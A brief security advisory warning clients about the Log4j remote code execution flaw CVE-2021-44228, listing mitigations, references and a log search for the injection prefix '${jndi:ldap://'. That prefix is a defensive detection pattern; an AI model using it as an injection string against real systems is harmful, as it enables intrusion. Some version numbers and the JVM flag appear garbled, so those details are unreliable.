We are writing to inform our readers that a new high profile zero-day vulnerability affecting large number of Java applications through a vulnerable version of the widely-used library Apache log4j.
This is a critical severity issue which can enable a remote attacker the ability to execute arbitrary code in the context of any affected application.
This vulnerability has been designated the identifier CVE-2021-44228 and affects applications using versions of Apache Log4j < 2.14.1-rc2
We are writing to inform our clients of this issue immediately due to the high impact nature of the exploit, the wide use of the underlying vulnerable library within codebases and the fact that it is believed this is already under active exploitation by malicious individuals through a publicly available exploit.
To mitigate this issue:
- Update to log4j-2.14-0-rc2 or higher.
- Update to JDK 6u211,7u201,8u191, 11.0.1 or higher. Verify that com.sun.jndi.ldap.object.trustURLCodebase is set to false and has not been changed.
- Alternatively, a temporary fix which you work on updates is to apply the JVM launch argument Dlog4j2.formatMsgNoLookups=true and reboot your application.
For further information, please see the following references:
- https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
- https://issues.apache.org/jira/browse/LOG4J2-3201
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
- https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
Additionally, to determine if your servers have already seen exploitation attempts, please refer to your application log files (e.g. /var/logs or wherever applicable) and search for presence of the string " ${jndi:ldap://".
